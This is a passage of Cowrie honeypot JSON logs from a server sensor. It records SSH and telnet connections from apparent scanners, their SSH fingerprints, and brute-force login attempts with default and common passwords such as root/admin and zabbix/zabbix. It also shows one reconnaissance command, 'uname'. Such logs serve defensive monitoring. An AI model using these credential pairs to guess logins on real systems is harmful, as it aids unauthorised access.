2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:25:30.667973Z","src_ip":"185.93.89.7","session":"d528e8cd1941"}
{"eventid":"cowrie.login.failed","username":"index","password":"qwerty123","message":"login attempt [index/qwerty123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:25:30.728127Z","src_ip":"185.93.89.7","session":"d528e8cd1941"}
{"eventid":"cowrie.login.success","username":"root","password":"P@55w0rd","message":"login attempt [root/P@55w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:25:31.482816Z","src_ip":"51.79.164.132","session":"ee8a31b85d4e"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":29476,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e84d7fdd2c5","protocol":"ssh","message":"New connection: 80.94.95.112:29476 (1.2.3.4:22) [session: 2e84d7fdd2c5]","sensor":"my-vps","timestamp":"2025-08-28T09:25:31.497208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T09:25:31.497974Z","src_ip":"80.94.95.112","session":"2e84d7fdd2c5"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T09:25:31.528116Z","src_ip":"80.94.95.112","session":"2e84d7fdd2c5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"antigone","message":"login attempt [admin/antigone] failed","sensor":"my-vps","timestamp":"2025-08-28T09:25:31.734864Z","src_ip":"80.94.95.112","session":"2e84d7fdd2c5"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:25:31.748510Z","src_ip":"185.93.89.7","session":"d528e8cd1941"}
{"eventid":"cowrie.session.connect","src_ip":"87.121.84.168","src_port":41872,"dst_ip":"1.2.3.4","dst_port":23,"session":"22dce9fead70","protocol":"telnet","message":"New connection: 87.121.84.168:41872 (1.2.3.4:23) [session: 22dce9fead70]","sensor":"my-vps","timestamp":"2025-08-28T09:25:32.004834Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:25:32.045053Z","src_ip":"87.121.84.168","session":"22dce9fead70"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:25:32.068733Z","src_ip":"87.121.84.168","session":"22dce9fead70"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:25:32.142648Z","src_ip":"51.79.164.132","session":"ee8a31b85d4e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:25:32.143579Z","src_ip":"51.79.164.132","session":"ee8a31b85d4e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"angelok","message":"login attempt [admin/angelok] failed","sensor":"my-vps","timestamp":"2025-08-28T09:25:32.766944Z","src_ip":"80.94.95.112","session":"2e84d7fdd2c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:25:32.768054Z","src_ip":"51.79.164.132","session":"ee8a31b85d4e"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:25:32.769793Z","src_ip":"51.79.164.132","session":"ee8a31b85d4e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"angele","message":"login attempt [admin/angele] failed","sensor":"my-vps","timestamp":"2025-08-28T09:25:33.803572Z","src_ip":"80.94.95.112","session":"2e84d7fdd2c5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"amnesia","message":"login attempt [admin/amnesia] failed","sensor":"my-vps","timestamp":"2025-08-28T09:25:34.836618Z","src_ip":"80.94.95.112","session":"2e84d7fdd2c5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"allyson","message":"login attempt [admin/allyson] failed","sensor":"my-vps","timestamp":"2025-08-28T09:25:35.869383Z","src_ip":"80.94.95.112","session":"2e84d7fdd2c5"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:25:36.901845Z","src_ip":"80.94.95.112","session":"2e84d7fdd2c5"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":60154,"dst_ip":"1.2.3.4","dst_port":22,"session":"6893a546e22c","protocol":"ssh","message":"New connection: 185.93.89.7:60154 (1.2.3.4:22) [session: 6893a546e22c]","sensor":"my-vps","timestamp":"2025-08-28T09:25:55.809435Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:25:55.813586Z","src_ip":"185.93.89.7","session":"6893a546e22c"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:25:55.830590Z","src_ip":"185.93.89.7","session":"6893a546e22c"}
{"eventid":"cowrie.login.failed","username":"index","password":"passw0rd","message":"login attempt [index/passw0rd] failed","sensor":"my-vps","timestamp":"2025-08-28T09:25:55.893767Z","src_ip":"185.93.89.7","session":"6893a546e22c"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":48584,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ea36aa284ac","protocol":"ssh","message":"New connection: 51.79.164.132:48584 (1.2.3.4:22) [session: 9ea36aa284ac]","sensor":"my-vps","timestamp":"2025-08-28T09:25:55.934690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:25:56.350059Z","src_ip":"51.79.164.132","session":"9ea36aa284ac"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:25:56.350751Z","src_ip":"51.79.164.132","session":"9ea36aa284ac"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:25:56.949859Z","src_ip":"185.93.89.7","session":"6893a546e22c"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890","message":"login attempt [root/1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:25:59.273021Z","src_ip":"51.79.164.132","session":"9ea36aa284ac"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:26:00.355074Z","src_ip":"51.79.164.132","session":"9ea36aa284ac"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:26:00.355770Z","src_ip":"51.79.164.132","session":"9ea36aa284ac"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:26:00.590611Z","src_ip":"51.79.164.132","session":"9ea36aa284ac"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:26:00.591847Z","src_ip":"51.79.164.132","session":"9ea36aa284ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49722,"dst_ip":"1.2.3.4","dst_port":23,"session":"d54de3187d07","protocol":"telnet","message":"New connection: 212.227.235.229:49722 (1.2.3.4:23) [session: d54de3187d07]","sensor":"my-vps","timestamp":"2025-08-28T09:26:12.459677Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:26:12.647856Z","src_ip":"212.227.235.229","session":"d54de3187d07"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:26:12.664534Z","src_ip":"212.227.235.229","session":"d54de3187d07"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":38256,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea18ff2302bb","protocol":"ssh","message":"New connection: 185.93.89.7:38256 (1.2.3.4:22) [session: ea18ff2302bb]","sensor":"my-vps","timestamp":"2025-08-28T09:26:19.964302Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:26:19.968811Z","src_ip":"185.93.89.7","session":"ea18ff2302bb"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:26:19.983038Z","src_ip":"185.93.89.7","session":"ea18ff2302bb"}
{"eventid":"cowrie.login.failed","username":"index","password":"forever","message":"login attempt [index/forever] failed","sensor":"my-vps","timestamp":"2025-08-28T09:26:20.038032Z","src_ip":"185.93.89.7","session":"ea18ff2302bb"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:26:21.067001Z","src_ip":"185.93.89.7","session":"ea18ff2302bb"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":55784,"dst_ip":"1.2.3.4","dst_port":22,"session":"d30f98a1422f","protocol":"ssh","message":"New connection: 51.79.164.132:55784 (1.2.3.4:22) [session: d30f98a1422f]","sensor":"my-vps","timestamp":"2025-08-28T09:26:23.083485Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:26:23.204243Z","src_ip":"51.79.164.132","session":"d30f98a1422f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:26:23.815895Z","src_ip":"51.79.164.132","session":"d30f98a1422f"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"zabbix","message":"login attempt [zabbix/zabbix] failed","sensor":"my-vps","timestamp":"2025-08-28T09:26:25.431017Z","src_ip":"51.79.164.132","session":"d30f98a1422f"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:26:26.941915Z","src_ip":"51.79.164.132","session":"d30f98a1422f"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":52136,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fbe5aba7280","protocol":"ssh","message":"New connection: 185.93.89.7:52136 (1.2.3.4:22) [session: 3fbe5aba7280]","sensor":"my-vps","timestamp":"2025-08-28T09:26:43.669641Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:26:43.670741Z","src_ip":"185.93.89.7","session":"3fbe5aba7280"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:26:43.688373Z","src_ip":"185.93.89.7","session":"3fbe5aba7280"}
{"eventid":"cowrie.login.failed","username":"index","password":"asdfghjkl","message":"login attempt [index/asdfghjkl] failed","sensor":"my-vps","timestamp":"2025-08-28T09:26:43.741144Z","src_ip":"185.93.89.7","session":"3fbe5aba7280"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:26:44.761573Z","src_ip":"185.93.89.7","session":"3fbe5aba7280"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":37690,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fcf02c3fa5c","protocol":"ssh","message":"New connection: 51.79.164.132:37690 (1.2.3.4:22) [session: 4fcf02c3fa5c]","sensor":"my-vps","timestamp":"2025-08-28T09:26:49.631899Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:26:50.065694Z","src_ip":"51.79.164.132","session":"4fcf02c3fa5c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:26:50.066447Z","src_ip":"51.79.164.132","session":"4fcf02c3fa5c"}
{"eventid":"cowrie.login.failed","username":"kubernetes","password":"kubernetes","message":"login attempt [kubernetes/kubernetes] failed","sensor":"my-vps","timestamp":"2025-08-28T09:26:52.085681Z","src_ip":"51.79.164.132","session":"4fcf02c3fa5c"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:26:53.441087Z","src_ip":"51.79.164.132","session":"4fcf02c3fa5c"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":43544,"dst_ip":"1.2.3.4","dst_port":22,"session":"d051d9e7a273","protocol":"ssh","message":"New connection: 185.93.89.7:43544 (1.2.3.4:22) [session: d051d9e7a273]","sensor":"my-vps","timestamp":"2025-08-28T09:27:08.080131Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:27:08.082782Z","src_ip":"185.93.89.7","session":"d051d9e7a273"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-